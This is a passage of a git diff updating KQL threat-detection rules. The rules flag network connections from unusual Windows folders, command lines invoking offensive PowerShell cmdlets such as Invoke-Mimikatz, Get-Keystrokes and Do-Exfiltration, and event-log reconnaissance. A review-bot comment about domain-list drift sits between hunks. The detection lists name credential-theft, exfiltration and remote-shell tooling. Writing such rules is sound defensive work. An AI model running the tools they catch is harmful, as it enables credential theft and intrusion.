+++ b/KQL/rules/windows/network_connection/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql
@@ -7,4 +7,4 @@
 // Tags: attack.command-and-control, attack.t1105
 
 DeviceNetworkEvents
-| where (InitiatingProcessFolderPath contains ":\\$Recycle.bin" or InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains ":\\Users\\Default\\" or InitiatingProcessFolderPath contains ":\\Windows\\Fonts\\" or InitiatingProcessFolderPath contains ":\\Windows\\IME\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\Tasks\\" or InitiatingProcessFolderPath contains ":\\Windows\\Tasks\\" or InitiatingProcessFolderPath contains "\\config\\systemprofile\\" or InitiatingProcessFolderPath contains "\\Windows\\addins\\") and (not((RemoteUrl endswith ".githubusercontent.com" or RemoteUrl endswith "anonfiles.com" or RemoteUrl endswith "cdn.discordapp.com" or RemoteUrl endswith "ddns.net" or RemoteUrl endswith "dl.dropboxusercontent.com" or RemoteUrl endswith "ghostbin.co" or RemoteUrl endswith "glitch.me" or RemoteUrl endswith "gofile.io" or RemoteUrl endswith "hastebin.com" or RemoteUrl endswith "mediafire.com" or RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz" or RemoteUrl endswith "onrender.com" or RemoteUrl endswith "pages.dev" or RemoteUrl endswith "paste.ee" or RemoteUrl endswith "pastebin.com" or RemoteUrl endswith "pastebin.pl" or RemoteUrl endswith "pastetext.net" or RemoteUrl endswith "portmap.io" or RemoteUrl endswith "privatlab.com" or RemoteUrl endswith "privatlab.net" or RemoteUrl endswith "send.exploit.in" or RemoteUrl endswith "sendspace.com" or RemoteUrl endswith "storage.googleapis.com" or RemoteUrl endswith "storjshare.io" or RemoteUrl endswith "supabase.co" or RemoteUrl endswith "temp.sh" or RemoteUrl endswith "transfer.sh" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "ufile.io" or RemoteUrl endswith "w3spaces.com" or RemoteUrl endswith "workers.dev")))
\ No newline at end of file
+| where (InitiatingProcessFolderPath contains ":\\$Recycle.bin" or InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains ":\\Users\\Default\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains ":\\Windows\\Fonts\\" or InitiatingProcessFolderPath contains ":\\Windows\\IME\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\Tasks\\" or InitiatingProcessFolderPath contains ":\\Windows\\Tasks\\" or InitiatingProcessFolderPath contains "\\config\\systemprofile\\" or InitiatingProcessFolderPath contains "\\Contacts\\" or InitiatingProcessFolderPath contains "\\Favorites\\" or InitiatingProcessFolderPath contains "\\Favourites\\" or InitiatingProcessFolderPath contains "\\Music\\" or InitiatingProcessFolderPath contains "\\Pictures\\" or InitiatingProcessFolderPath contains "\\Videos\\" or InitiatingProcessFolderPath contains "\\Windows\\addins\\") and (not((RemoteUrl endswith ".githubusercontent.com" or RemoteUrl endswith "anonfiles.com" or RemoteUrl endswith "cdn.discordapp.com" or RemoteUrl endswith "ddns.net" or RemoteUrl endswith "dl.dropboxusercontent.com" or RemoteUrl endswith "ghostbin.co" or RemoteUrl endswith "github.com" or RemoteUrl endswith "glitch.me" or RemoteUrl endswith "gofile.io" or RemoteUrl endswith "hastebin.com" or RemoteUrl endswith "mediafire.com" or RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz" or RemoteUrl endswith "onrender.com" or RemoteUrl endswith "pages.dev" or RemoteUrl endswith "paste.ee" or RemoteUrl endswith "pastebin.com" or RemoteUrl endswith "pastebin.pl" or RemoteUrl endswith "pastetext.net" or RemoteUrl endswith "portmap.io" or RemoteUrl endswith "privatlab.com" or RemoteUrl endswith "privatlab.net" or RemoteUrl endswith "send.exploit.in" or RemoteUrl endswith "sendspace.com" or RemoteUrl endswith "storage.googleapis.com" or RemoteUrl endswith "storjshare.io" or RemoteUrl endswith "supabase.co" or RemoteUrl endswith "temp.sh" or RemoteUrl endswith "transfer.sh" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "ufile.io" or RemoteUrl endswith "w3spaces.com" or RemoteUrl endswith "workers.dev")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/malicious_powershell_commandlets_processcreation.kql b/KQL/rules/windows/process_creation/malicious_powershell_commandlets_processcreation.kql
index a8fe0a43..93509013 100644
--- a/KQL/rules/windows/process_creation/malicious_powershell_commandlets_processcreation.kql
+++ b/KQL/rules/windows/process_creation/malicious_powershell_commandlets_processcreation.kql
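Review bot: The domain exclusion list in the new `+| where` line has drifted from the inclusion list of the file-sharing rule in the previous hunk, which it presumably mirrors so that traffic to those domains is alerted there rather than here: this list carries `RemoteUrl endswith "portmap.io"` but not `"pixeldrain.com"`, while the file-sharing rule carries `"pixeldrain.com"` but not `"portmap.io"`. As a result a connection from one of the listed folders to portmap.io is excluded here and not matched there, so it raises nothing at all, whereas pixeldrain.com alerts in both rules. Either make the two lists identical or add a comment on this line naming the sibling rule the list must stay in sync with. Both hunks also add `RemoteUrl endswith "github.com"` without a leading dot, so unlike `".githubusercontent.com"` in the same lists it matches any hostname that merely ends in that string (a constructed `mygithub.com`, for example); `RemoteUrl =~ "github.com" or RemoteUrl endswith ".github.com"` would pin it to the apex and its subdomains, though several older entries share the no-dot form. The folder lists differ as well (this rule gains `\\Contacts\\`, `\\Music\\` and similar but lacks `\\Windows\\Temp\\` and `\\AppData\\Temp\\`), which may be intentional.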
@@ -7,4 +7,4 @@
 // Tags: attack.execution, attack.discovery, attack.t1482, attack.t1087, attack.t1087.001, attack.t1087.002, attack.t1069.001, attack.t1069.002, attack.t1069, attack.t1059.001
 
 DeviceProcessEvents
-| where ProcessCommandLine contains "Add-Exfiltration" or ProcessCommandLine contains "Add-Persistence" or ProcessCommandLine contains "Add-RegBackdoor" or ProcessCommandLine contains "Add-RemoteRegBackdoor" or ProcessCommandLine contains "Add-ScrnSaveBackdoor" or ProcessCommandLine contains "Check-VM" or ProcessCommandLine contains "ConvertTo-Rc4ByteStream" or ProcessCommandLine contains "Decrypt-Hash" or ProcessCommandLine contains "Disable-ADIDNSNode" or ProcessCommandLine contains "Disable-MachineAccount" or ProcessCommandLine contains "Do-Exfiltration" or ProcessCommandLine contains "Enable-ADIDNSNode" or ProcessCommandLine contains "Enable-MachineAccount" or ProcessCommandLine contains "Enabled-DuplicateToken" or ProcessCommandLine contains "Exploit-Jboss" or ProcessCommandLine contains "Export-ADR" or ProcessCommandLine contains "Export-ADRCSV" or ProcessCommandLine contains "Export-ADRExcel" or ProcessCommandLine contains "Export-ADRHTML" or ProcessCommandLine contains "Export-ADRJSON" or ProcessCommandLine contains "Export-ADRXML" or ProcessCommandLine contains "Find-Fruit" or ProcessCommandLine contains "Find-GPOLocation" or ProcessCommandLine contains "Find-TrustedDocuments" or ProcessCommandLine contains "Get-ADIDNS" or ProcessCommandLine contains "Get-ApplicationHost" or ProcessCommandLine contains "Get-ChromeDump" or ProcessCommandLine contains "Get-ClipboardContents" or ProcessCommandLine contains "Get-FoxDump" or ProcessCommandLine contains "Get-GPPPassword" or ProcessCommandLine contains "Get-IndexedItem" or ProcessCommandLine contains "Get-KerberosAESKey" or ProcessCommandLine contains "Get-Keystrokes" or ProcessCommandLine contains "Get-LSASecret" or ProcessCommandLine contains "Get-MachineAccountAttribute" or ProcessCommandLine contains "Get-MachineAccountCreator" or ProcessCommandLine contains "Get-PassHashes" or ProcessCommandLine contains "Get-RegAlwaysInstallElevated" or ProcessCommandLine contains "Get-RegAutoLogon" or ProcessCommandLine contains "Get-RemoteBootKey" or ProcessCommandLine contains "Get-RemoteCachedCredential" or ProcessCommandLine contains "Get-RemoteLocalAccountHash" or ProcessCommandLine contains "Get-RemoteLSAKey" or ProcessCommandLine contains "Get-RemoteMachineAccountHash" or ProcessCommandLine contains "Get-RemoteNLKMKey" or ProcessCommandLine contains "Get-RickAstley" or ProcessCommandLine contains "Get-Screenshot" or ProcessCommandLine contains "Get-SecurityPackages" or ProcessCommandLine contains "Get-ServiceFilePermission" or ProcessCommandLine contains "Get-ServicePermission" or ProcessCommandLine contains "Get-ServiceUnquoted" or ProcessCommandLine contains "Get-SiteListPassword" or ProcessCommandLine contains "Get-System" or ProcessCommandLine contains "Get-TimedScreenshot" or ProcessCommandLine contains "Get-UnattendedInstallFile" or ProcessCommandLine contains "Get-Unconstrained" or ProcessCommandLine contains "Get-USBKeystrokes" or ProcessCommandLine contains "Get-VaultCredential" or ProcessCommandLine contains "Get-VulnAutoRun" or ProcessCommandLine contains "Get-VulnSchTask" or ProcessCommandLine contains "Grant-ADIDNSPermission" or ProcessCommandLine contains "Gupt-Backdoor" or ProcessCommandLine contains "HTTP-Login" or ProcessCommandLine contains "Install-ServiceBinary" or ProcessCommandLine contains "Install-SSP" or ProcessCommandLine contains "Invoke-ACLScanner" or ProcessCommandLine contains "Invoke-ADRecon" or ProcessCommandLine contains "Invoke-ADSBackdoor" or ProcessCommandLine contains "Invoke-AgentSmith" or ProcessCommandLine contains "Invoke-AllChecks" or ProcessCommandLine contains "Invoke-ARPScan" or ProcessCommandLine contains "Invoke-AzureHound" or ProcessCommandLine contains "Invoke-BackdoorLNK" or ProcessCommandLine contains "Invoke-BadPotato" or ProcessCommandLine contains "Invoke-BetterSafetyKatz" or ProcessCommandLine contains "Invoke-BypassUAC" or ProcessCommandLine contains "Invoke-Carbuncle" or ProcessCommandLine contains "Invoke-Certify" or ProcessCommandLine contains "Invoke-ConPtyShell" or ProcessCommandLine contains "Invoke-CredentialInjection" or ProcessCommandLine contains "Invoke-DAFT" or ProcessCommandLine contains "Invoke-DCSync" or ProcessCommandLine contains "Invoke-DinvokeKatz" or ProcessCommandLine contains "Invoke-DllInjection" or ProcessCommandLine contains "Invoke-DNSUpdate" or ProcessCommandLine contains "Invoke-DomainPasswordSpray" or ProcessCommandLine contains "Invoke-DowngradeAccount" or ProcessCommandLine contains "Invoke-EgressCheck" or ProcessCommandLine contains "Invoke-Eyewitness" or ProcessCommandLine contains "Invoke-FakeLogonScreen" or ProcessCommandLine contains "Invoke-Farmer" or ProcessCommandLine contains "Invoke-Get-RBCD-Threaded" or ProcessCommandLine contains "Invoke-Gopher" or ProcessCommandLine contains "Invoke-Grouper" or ProcessCommandLine contains "Invoke-HandleKatz" or ProcessCommandLine contains "Invoke-ImpersonatedProcess" or ProcessCommandLine contains "Invoke-ImpersonateSystem" or ProcessCommandLine contains "Invoke-InteractiveSystemPowerShell" or ProcessCommandLine contains "Invoke-Internalmonologue" or ProcessCommandLine contains "Invoke-Inveigh" or ProcessCommandLine contains "Invoke-InveighRelay" or ProcessCommandLine contains "Invoke-KrbRelay" or ProcessCommandLine contains "Invoke-LdapSignCheck" or ProcessCommandLine contains "Invoke-Lockless" or ProcessCommandLine contains "Invoke-MalSCCM" or ProcessCommandLine contains "Invoke-Mimikatz" or ProcessCommandLine contains "Invoke-Mimikittenz" or ProcessCommandLine contains "Invoke-MITM6" or ProcessCommandLine contains "Invoke-NanoDump" or ProcessCommandLine contains "Invoke-NetRipper" or ProcessCommandLine contains "Invoke-Nightmare" or ProcessCommandLine contains "Invoke-NinjaCopy" or ProcessCommandLine contains "Invoke-OfficeScrape" or ProcessCommandLine contains "Invoke-OxidResolver" or ProcessCommandLine contains "Invoke-P0wnedshell" or ProcessCommandLine contains "Invoke-Paranoia" or ProcessCommandLine contains "Invoke-PortScan" or ProcessCommandLine contains "Invoke-PoshRatHttp" or ProcessCommandLine contains "Invoke-PostExfil" or ProcessCommandLine contains "Invoke-PowerDump" or ProcessCommandLine contains "Invoke-PowerDPAPI" or ProcessCommandLine contains "Invoke-PowerShellTCP" or ProcessCommandLine contains "Invoke-PowerShellWMI" or ProcessCommandLine contains "Invoke-PPLDump" or ProcessCommandLine contains "Invoke-PsExec" or ProcessCommandLine contains "Invoke-PSInject" or ProcessCommandLine contains "Invoke-PsUaCme" or ProcessCommandLine contains "Invoke-ReflectivePEInjection" or ProcessCommandLine contains "Invoke-ReverseDNSLookup" or ProcessCommandLine contains "Invoke-Rubeus" or ProcessCommandLine contains "Invoke-RunAs" or ProcessCommandLine contains "Invoke-SafetyKatz" or ProcessCommandLine contains "Invoke-SauronEye" or ProcessCommandLine contains "Invoke-SCShell" or ProcessCommandLine contains "Invoke-Seatbelt" or ProcessCommandLine contains "Invoke-ServiceAbuse" or ProcessCommandLine contains "Invoke-ShadowSpray" or ProcessCommandLine contains "Invoke-Sharp" or ProcessCommandLine contains "Invoke-Shellcode" or ProcessCommandLine contains "Invoke-SMBScanner" or ProcessCommandLine contains "Invoke-Snaffler" or ProcessCommandLine contains "Invoke-Spoolsample" or ProcessCommandLine contains "Invoke-SpraySinglePassword" or ProcessCommandLine contains "Invoke-SSHCommand" or ProcessCommandLine contains "Invoke-StandIn" or ProcessCommandLine contains "Invoke-StickyNotesExtract" or ProcessCommandLine contains "Invoke-SystemCommand" or ProcessCommandLine contains "Invoke-Tasksbackdoor" or ProcessCommandLine contains "Invoke-Tater" or ProcessCommandLine contains "Invoke-Thunderfox" or ProcessCommandLine contains "Invoke-ThunderStruck" or ProcessCommandLine contains "Invoke-TokenManipulation" or ProcessCommandLine contains "Invoke-Tokenvator" or ProcessCommandLine contains "Invoke-TotalExec" or ProcessCommandLine contains "Invoke-UrbanBishop" or ProcessCommandLine contains "Invoke-UserHunter" or ProcessCommandLine contains "Invoke-VoiceTroll" or ProcessCommandLine contains "Invoke-Whisker" or ProcessCommandLine contains "Invoke-WinEnum" or ProcessCommandLine contains "Invoke-winPEAS" or ProcessCommandLine contains "Invoke-WireTap" or ProcessCommandLine contains "Invoke-WmiCommand" or ProcessCommandLine contains "Invoke-WMIExec" or ProcessCommandLine contains "Invoke-WScriptBypassUAC" or ProcessCommandLine contains "Invoke-Zerologon" or ProcessCommandLine contains "MailRaider" or ProcessCommandLine contains "New-ADIDNSNode" or ProcessCommandLine contains "New-DNSRecordArray" or ProcessCommandLine contains "New-HoneyHash" or ProcessCommandLine contains "New-InMemoryModule" or ProcessCommandLine contains "New-MachineAccount" or ProcessCommandLine contains "New-SOASerialNumberArray" or ProcessCommandLine contains "Out-Minidump" or ProcessCommandLine contains "Port-Scan" or ProcessCommandLine contains "PowerBreach" or ProcessCommandLine contains "powercat " or ProcessCommandLine contains "PowerUp" or ProcessCommandLine contains "PowerView" or ProcessCommandLine contains "Remove-ADIDNSNode" or ProcessCommandLine contains "Remove-MachineAccount" or ProcessCommandLine contains "Remove-Update" or ProcessCommandLine contains "Rename-ADIDNSNode" or ProcessCommandLine contains "Revoke-ADIDNSPermission" or ProcessCommandLine contains "Set-ADIDNSNode" or ProcessCommandLine contains "Set-MacAttribute" or ProcessCommandLine contains "Set-MachineAccountAttribute" or ProcessCommandLine contains "Set-Wallpaper" or ProcessCommandLine contains "Show-TargetScreen" or ProcessCommandLine contains "Start-CaptureServer" or ProcessCommandLine contains "Start-Dnscat2" or ProcessCommandLine contains "Start-WebcamRecorder" or ProcessCommandLine contains "Veeam-Get-Creds" or ProcessCommandLine contains "VolumeShadowCopyTools"
\ No newline at end of file
+| where ProcessCommandLine contains "Add-Exfiltration" or ProcessCommandLine contains "Add-Persistence" or ProcessCommandLine contains "Add-RegBackdoor" or ProcessCommandLine contains "Add-RemoteRegBackdoor" or ProcessCommandLine contains "Add-ScrnSaveBackdoor" or ProcessCommandLine contains "Check-VM" or ProcessCommandLine contains "ConvertTo-Rc4ByteStream" or ProcessCommandLine contains "Decrypt-Hash" or ProcessCommandLine contains "Disable-ADIDNSNode" or ProcessCommandLine contains "Disable-MachineAccount" or ProcessCommandLine contains "Do-Exfiltration" or ProcessCommandLine contains "Enable-ADIDNSNode" or ProcessCommandLine contains "Enable-MachineAccount" or ProcessCommandLine contains "Enabled-DuplicateToken" or ProcessCommandLine contains "Exploit-Jboss" or ProcessCommandLine contains "Export-ADR" or ProcessCommandLine contains "Export-ADRCSV" or ProcessCommandLine contains "Export-ADRExcel" or ProcessCommandLine contains "Export-ADRHTML" or ProcessCommandLine contains "Export-ADRJSON" or ProcessCommandLine contains "Export-ADRXML" or ProcessCommandLine contains "Find-Fruit" or ProcessCommandLine contains "Find-GPOLocation" or ProcessCommandLine contains "Find-TrustedDocuments" or ProcessCommandLine contains "Get-ADIDNS" or ProcessCommandLine contains "Get-ApplicationHost" or ProcessCommandLine contains "Get-ChromeDump" or ProcessCommandLine contains "Get-ClipboardContents" or ProcessCommandLine contains "Get-FoxDump" or ProcessCommandLine contains "Get-GPPPassword" or ProcessCommandLine contains "Get-IndexedItem" or ProcessCommandLine contains "Get-KerberosAESKey" or ProcessCommandLine contains "Get-Keystrokes" or ProcessCommandLine contains "Get-LSASecret" or ProcessCommandLine contains "Get-MachineAccountAttribute" or ProcessCommandLine contains "Get-MachineAccountCreator" or ProcessCommandLine 
contains "Get-PassHashes" or ProcessCommandLine contains "Get-RegAlwaysInstallElevated" or ProcessCommandLine contains "Get-RegAutoLogon" or ProcessCommandLine contains "Get-RemoteBootKey" or ProcessCommandLine contains "Get-RemoteCachedCredential" or ProcessCommandLine contains "Get-RemoteLocalAccountHash" or ProcessCommandLine contains "Get-RemoteLSAKey" or ProcessCommandLine contains "Get-RemoteMachineAccountHash" or ProcessCommandLine contains "Get-RemoteNLKMKey" or ProcessCommandLine contains "Get-RickAstley" or ProcessCommandLine contains "Get-Screenshot" or ProcessCommandLine contains "Get-SecurityPackages" or ProcessCommandLine contains "Get-ServiceFilePermission" or ProcessCommandLine contains "Get-ServicePermission" or ProcessCommandLine contains "Get-ServiceUnquoted" or ProcessCommandLine contains "Get-SiteListPassword" or ProcessCommandLine contains "Get-System" or ProcessCommandLine contains "Get-TimedScreenshot" or ProcessCommandLine contains "Get-UnattendedInstallFile" or ProcessCommandLine contains "Get-Unconstrained" or ProcessCommandLine contains "Get-USBKeystrokes" or ProcessCommandLine contains "Get-VaultCredential" or ProcessCommandLine contains "Get-VulnAutoRun" or ProcessCommandLine contains "Get-VulnSchTask" or ProcessCommandLine contains "Grant-ADIDNSPermission" or ProcessCommandLine contains "Gupt-Backdoor" or ProcessCommandLine contains "HTTP-Login" or ProcessCommandLine contains "Install-ServiceBinary" or ProcessCommandLine contains "Install-SSP" or ProcessCommandLine contains "Invoke-ACLScanner" or ProcessCommandLine contains "Invoke-ADRecon" or ProcessCommandLine contains "Invoke-ADSBackdoor" or ProcessCommandLine contains "Invoke-AgentSmith" or ProcessCommandLine contains "Invoke-AllChecks" or ProcessCommandLine contains "Invoke-ARPScan" or ProcessCommandLine contains "Invoke-AzureHound" or ProcessCommandLine contains "Invoke-BackdoorLNK" or ProcessCommandLine contains "Invoke-BadPotato" or ProcessCommandLine contains 
"Invoke-BetterSafetyKatz" or ProcessCommandLine contains "Invoke-BypassUAC" or ProcessCommandLine contains "Invoke-Carbuncle" or ProcessCommandLine contains "Invoke-Certify" or ProcessCommandLine contains "Invoke-ConPtyShell" or ProcessCommandLine contains "Invoke-CredentialInjection" or ProcessCommandLine contains "Invoke-DAFT" or ProcessCommandLine contains "Invoke-DCSync" or ProcessCommandLine contains "Invoke-DinvokeKatz" or ProcessCommandLine contains "Invoke-DllInjection" or ProcessCommandLine contains "Invoke-DNSUpdate" or ProcessCommandLine contains "Invoke-DNSExfiltrator" or ProcessCommandLine contains "Invoke-DomainPasswordSpray" or ProcessCommandLine contains "Invoke-DowngradeAccount" or ProcessCommandLine contains "Invoke-EgressCheck" or ProcessCommandLine contains "Invoke-Eyewitness" or ProcessCommandLine contains "Invoke-FakeLogonScreen" or ProcessCommandLine contains "Invoke-Farmer" or ProcessCommandLine contains "Invoke-Get-RBCD-Threaded" or ProcessCommandLine contains "Invoke-Gopher" or ProcessCommandLine contains "Invoke-Grouper" or ProcessCommandLine contains "Invoke-HandleKatz" or ProcessCommandLine contains "Invoke-ImpersonatedProcess" or ProcessCommandLine contains "Invoke-ImpersonateSystem" or ProcessCommandLine contains "Invoke-InteractiveSystemPowerShell" or ProcessCommandLine contains "Invoke-Internalmonologue" or ProcessCommandLine contains "Invoke-Inveigh" or ProcessCommandLine contains "Invoke-InveighRelay" or ProcessCommandLine contains "Invoke-KrbRelay" or ProcessCommandLine contains "Invoke-LdapSignCheck" or ProcessCommandLine contains "Invoke-Lockless" or ProcessCommandLine contains "Invoke-MalSCCM" or ProcessCommandLine contains "Invoke-Mimikatz" or ProcessCommandLine contains "Invoke-Mimikittenz" or ProcessCommandLine contains "Invoke-MITM6" or ProcessCommandLine contains "Invoke-NanoDump" or ProcessCommandLine contains "Invoke-NetRipper" or ProcessCommandLine contains "Invoke-Nightmare" or ProcessCommandLine contains 
"Invoke-NinjaCopy" or ProcessCommandLine contains "Invoke-OfficeScrape" or ProcessCommandLine contains "Invoke-OxidResolver" or ProcessCommandLine contains "Invoke-P0wnedshell" or ProcessCommandLine contains "Invoke-Paranoia" or ProcessCommandLine contains "Invoke-PortScan" or ProcessCommandLine contains "Invoke-PoshRatHttp" or ProcessCommandLine contains "Invoke-PostExfil" or ProcessCommandLine contains "Invoke-PowerDump" or ProcessCommandLine contains "Invoke-PowerDPAPI" or ProcessCommandLine contains "Invoke-PowerShellTCP" or ProcessCommandLine contains "Invoke-PowerShellWMI" or ProcessCommandLine contains "Invoke-PPLDump" or ProcessCommandLine contains "Invoke-PsExec" or ProcessCommandLine contains "Invoke-PSInject" or ProcessCommandLine contains "Invoke-PsUaCme" or ProcessCommandLine contains "Invoke-ReflectivePEInjection" or ProcessCommandLine contains "Invoke-ReverseDNSLookup" or ProcessCommandLine contains "Invoke-Rubeus" or ProcessCommandLine contains "Invoke-RunAs" or ProcessCommandLine contains "Invoke-SafetyKatz" or ProcessCommandLine contains "Invoke-SauronEye" or ProcessCommandLine contains "Invoke-SCShell" or ProcessCommandLine contains "Invoke-Seatbelt" or ProcessCommandLine contains "Invoke-ServiceAbuse" or ProcessCommandLine contains "Invoke-ShadowSpray" or ProcessCommandLine contains "Invoke-Sharp" or ProcessCommandLine contains "Invoke-Shellcode" or ProcessCommandLine contains "Invoke-SMBScanner" or ProcessCommandLine contains "Invoke-Snaffler" or ProcessCommandLine contains "Invoke-Spoolsample" or ProcessCommandLine contains "Invoke-SpraySinglePassword" or ProcessCommandLine contains "Invoke-SSHCommand" or ProcessCommandLine contains "Invoke-StandIn" or ProcessCommandLine contains "Invoke-StickyNotesExtract" or ProcessCommandLine contains "Invoke-SystemCommand" or ProcessCommandLine contains "Invoke-Tasksbackdoor" or ProcessCommandLine contains "Invoke-Tater" or ProcessCommandLine contains "Invoke-Thunderfox" or ProcessCommandLine contains 
"Invoke-ThunderStruck" or ProcessCommandLine contains "Invoke-TokenManipulation" or ProcessCommandLine contains "Invoke-Tokenvator" or ProcessCommandLine contains "Invoke-TotalExec" or ProcessCommandLine contains "Invoke-UrbanBishop" or ProcessCommandLine contains "Invoke-UserHunter" or ProcessCommandLine contains "Invoke-VoiceTroll" or ProcessCommandLine contains "Invoke-Whisker" or ProcessCommandLine contains "Invoke-WinEnum" or ProcessCommandLine contains "Invoke-winPEAS" or ProcessCommandLine contains "Invoke-WireTap" or ProcessCommandLine contains "Invoke-WmiCommand" or ProcessCommandLine contains "Invoke-WMIExec" or ProcessCommandLine contains "Invoke-WScriptBypassUAC" or ProcessCommandLine contains "Invoke-Zerologon" or ProcessCommandLine contains "MailRaider" or ProcessCommandLine contains "New-ADIDNSNode" or ProcessCommandLine contains "New-DNSRecordArray" or ProcessCommandLine contains "New-HoneyHash" or ProcessCommandLine contains "New-InMemoryModule" or ProcessCommandLine contains "New-MachineAccount" or ProcessCommandLine contains "New-SOASerialNumberArray" or ProcessCommandLine contains "Out-Minidump" or ProcessCommandLine contains "Port-Scan" or ProcessCommandLine contains "PowerBreach" or ProcessCommandLine contains "powercat " or ProcessCommandLine contains "PowerUp" or ProcessCommandLine contains "PowerView" or ProcessCommandLine contains "Remove-ADIDNSNode" or ProcessCommandLine contains "Remove-MachineAccount" or ProcessCommandLine contains "Remove-Update" or ProcessCommandLine contains "Rename-ADIDNSNode" or ProcessCommandLine contains "Revoke-ADIDNSPermission" or ProcessCommandLine contains "Set-ADIDNSNode" or ProcessCommandLine contains "Set-MacAttribute" or ProcessCommandLine contains "Set-MachineAccountAttribute" or ProcessCommandLine contains "Set-Wallpaper" or ProcessCommandLine contains "Show-TargetScreen" or ProcessCommandLine contains "Start-CaptureServer" or ProcessCommandLine contains "Start-Dnscat2" or ProcessCommandLine contains 
"Start-WebcamRecorder" or ProcessCommandLine contains "Veeam-Get-Creds" or ProcessCommandLine contains "VolumeShadowCopyTools" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql b/KQL/rules/windows/process_creation/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql index a0a3c7e4..a3e98fd2 100644 --- a/KQL/rules/windows/process_creation/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql +++ b/KQL/rules/windows/process_creation/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql 
@@ -5,9 +5,9 @@
 // Description: Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs.
 // This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc.
 // MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.discovery, attack.t1552
+// Tags: attack.credential-access, attack.discovery, attack.t1552, attack.t1087
 // False Positives:
 // - Legitimate usage of the utility by administrators to query the event log
 DeviceProcessEvents
-| where (((ProcessCommandLine contains "-InstanceId 462") or (ProcessCommandLine contains ".eventid -eq 462") or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "462") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "462") or (ProcessCommandLine contains "System[EventID=462" and ProcessCommandLine contains "]") or ProcessCommandLine contains "-InstanceId 4778" or ProcessCommandLine contains ".eventid -eq 4778" or ProcessCommandLine contains "System[EventID=4778]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "4778") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "4778") or ProcessCommandLine contains "-InstanceId 25" or ProcessCommandLine contains ".eventid -eq 25" or ProcessCommandLine contains "System[EventID=25]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "25") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "25")) or (ProcessCommandLine contains "Microsoft-Windows-PowerShell" or ProcessCommandLine contains "Microsoft-Windows-Security-Auditing" or ProcessCommandLine contains "Microsoft-Windows-TerminalServices-LocalSessionManager" or ProcessCommandLine contains "Microsoft-Windows-TerminalServices-RemoteConnectionManager" or ProcessCommandLine 
contains "Microsoft-Windows-Windows Defender" or ProcessCommandLine contains "PowerShellCore" or ProcessCommandLine contains "Security" or ProcessCommandLine contains "Windows PowerShell")) and ((ProcessCommandLine contains "Select" and ProcessCommandLine contains "Win32_NTLogEvent") or ((ProcessCommandLine contains " qe " or ProcessCommandLine contains " query-events ") and (FolderPath endswith "\\wevtutil.exe" or ProcessVersionInfoOriginalFileName =~ "wevtutil.exe")) or (ProcessCommandLine contains " ntevent" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) or (ProcessCommandLine contains "Get-WinEvent " or ProcessCommandLine contains "get-eventlog "))
\ No newline at end of file
+| where (((ProcessCommandLine contains "-InstanceId 462") or (ProcessCommandLine contains ".eventid -eq 462") or (ProcessCommandLine contains ".ID -eq 462") or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "462") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "462") or (ProcessCommandLine contains "System[EventID=462" and ProcessCommandLine contains "]") or ProcessCommandLine contains "-InstanceId 4778" or ProcessCommandLine contains ".eventid -eq 4778" or ProcessCommandLine contains ".ID -eq 4778" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "4778") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "4778") or ProcessCommandLine contains "System[EventID=4778]" or ProcessCommandLine contains "-InstanceId 25" or ProcessCommandLine contains ".eventid -eq 25" or ProcessCommandLine contains ".ID -eq 25" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "25") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "25") or ProcessCommandLine contains "System[EventID=25]" or ProcessCommandLine contains "-InstanceId 1149" or ProcessCommandLine contains ".eventid -eq 1149" 
or ProcessCommandLine contains ".ID -eq 1149" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "1149") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "1149") or ProcessCommandLine contains "System[EventID=1149]" or ProcessCommandLine contains "-InstanceId 21" or ProcessCommandLine contains ".eventid -eq 21" or ProcessCommandLine contains ".ID -eq 21" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "21") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "21") or ProcessCommandLine contains "System[EventID=21]" or ProcessCommandLine contains "-InstanceId 22" or ProcessCommandLine contains ".eventid -eq 22" or ProcessCommandLine contains ".ID -eq 22" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "22") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "22") or ProcessCommandLine contains "System[EventID=22]") or (ProcessCommandLine contains "Microsoft-Windows-PowerShell" or ProcessCommandLine contains "Microsoft-Windows-Security-Auditing" or ProcessCommandLine contains "Microsoft-Windows-TerminalServices-LocalSessionManager" or ProcessCommandLine contains 